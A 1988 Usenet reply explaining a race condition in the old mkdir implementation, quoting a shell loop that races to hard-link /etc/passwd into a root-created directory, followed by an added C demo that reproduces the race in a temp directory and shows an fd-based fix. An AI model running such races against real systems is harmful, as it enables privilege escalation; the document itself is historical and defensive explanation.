Xref: utzoo news.sysadmin:1873 news.admin:4220
Path: utzoo!utgpu!watmath!clyde!att!osu-cis!tut.cis.ohio-state.edu!cwjcc!hal!nic.MR.NET!tank!mimsy!dftsrv!ames!amdcad!sun!pitstop!sundc!seismo!uunet!mcvax!hp4nl!botter!star.cs.vu.nl!maart
From: maart@cs.vu.nl (Maarten Litmaath)
Newsgroups: news.sysadmin,news.admin
Subject: Re: security hole
Keywords: security, bug
Message-ID: <1777@solo11.cs.vu.nl>
Date: 7 Dec 88 02:11:17 GMT
References: <1191@altger.UUCP>
Organization: V.U. Informatica, Amsterdam, the Netherlands
Lines: 24

blue@altger.UUCP (blue) writes:
\ while true
\ do
\   nice -39 mkdir foo &
\   rm -rf foo
\   ln /etc/passwd foo; rm -fr foo &
\   ls -l /etc/passwd
\ done

This is precisely why nowadays there's a mkdir() system call!
Formerly the mkdir scheme was as follows:

	mknod(path, S_IFDIR, dev);
	/* now the directory exists, its owner is root and it's empty */
	chown(path, uid, gid);
	/* now the owner is set */
	chdir(path);
	link(path, ".");	/* make entry `.' in new directory */
	link(parent, "..");	/* make entry `..' */

The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but
BEFORE the chown(). Due to race conditions this scheme will eventually succeed.
-- 
fcntl(fd, F_SETFL, FNDELAY):   |Maarten Litmaath @ VU Amsterdam:
let's go weepin' in the corner!|maart@cs.vu.nl, mcvax!botter!maart
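The race the post describes, reproduced as an added C example that is not part of the original posting and not the historical mkdir(1) code. It stands in for the old scheme with two substitutions, both assumptions made so the demo runs unprivileged on a current kernel: mkdir(2) replaces mknod(S_IFDIR) for step one, and chmod(2) replaces chown(2) for the path-based step two (the failure mode is the same: the name is resolved a second time and now points at whatever the attacker linked in). The attacker's `rm -rf foo; ln /etc/passwd foo' is injected deterministically between the two steps instead of being won by racing, and a constructed file inside a fresh temporary directory stands in for /etc/passwd. The hardened variant does what modern code should do after creating an object: open it with O_DIRECTORY|O_NOFOLLOW, verify with fstat, and act on the descriptor, so a swapped-in regular file is refused with ENOTDIR instead of being modified.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Victim, step 1 of the old scheme: create the directory.
 * Assumed stand-in for mknod(path, S_IFDIR, dev), which an unprivileged
 * process cannot issue on a modern kernel. */
static int victim_create(const char *path)
{
    return mkdir(path, 0700);
}

/* Attacker's move inside the window: the post's `rm -rf foo; ln /etc/passwd foo'.
 * Injected deterministically here rather than won by racing. */
static int attacker_swap(const char *path, const char *target)
{
    if (rmdir(path) != 0)
        return -1;
    return link(target, path);
}

/* Victim, step 2, the old way: act on the *name* again. The post's
 * chown(path, ...) is replaced by chmod(path, ...) so no privilege is needed;
 * the name now resolves to the attacker's target, which gets modified. */
static int victim_finish_by_path(const char *path, mode_t mode)
{
    return chmod(path, mode);
}

/* Victim, step 2, hardened: open what the name resolves to as a directory,
 * verify it, then act on the descriptor. A swapped-in regular file fails the
 * O_DIRECTORY open (ENOTDIR); the S_ISDIR check guards older systems. */
static int victim_finish_by_fd(const char *path, mode_t mode)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode)) {
        close(fd);
        errno = ENOTDIR;
        return -1;
    }
    int rc = fchmod(fd, mode);
    close(fd);
    return rc;
}

/* One round. Returns 1 if the attacker's target ended up mode 0777 (the race
 * "hit"), 0 if it kept 0600, -1 on setup failure. Everything lives in a fresh
 * temporary directory; nothing touches /etc. */
int run_race(int hardened)
{
    char dir[] = "/tmp/mkdir-race-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;

    char target[256], victim[256];
    snprintf(target, sizeof target, "%s/passwd", dir); /* constructed stand-in for /etc/passwd */
    snprintf(victim, sizeof victim, "%s/foo", dir);

    int result = -1;
    int tfd = open(target, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (tfd < 0)
        goto out;
    close(tfd);
    if (chmod(target, 0600) != 0) /* normalise regardless of umask */
        goto out;

    if (victim_create(victim) != 0 || attacker_swap(victim, target) != 0)
        goto out;

    if (hardened)
        victim_finish_by_fd(victim, 0777);   /* fails with ENOTDIR, target untouched */
    else
        victim_finish_by_path(victim, 0777); /* silently changes the target */

    struct stat st;
    if (stat(target, &st) != 0)
        goto out;
    result = ((st.st_mode & 07777) == 0777) ? 1 : 0;

out:
    unlink(victim);
    unlink(target);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("old scheme (chmod by path): target mode changed = %d\n", run_race(0));
    printf("fd-based scheme (fchmod):   target mode changed = %d\n", run_race(1));
    return 0;
}
```

The point the post makes about mkdir(2) generalises: whenever a privileged program creates an object and then performs a second operation on it by name, an attacker who can replace that name in between redirects the second operation. The fix is either a single atomic system call (mkdir, as the post says) or holding the object by descriptor and using the f*-family calls (fchown, fchmod, openat) for every later step.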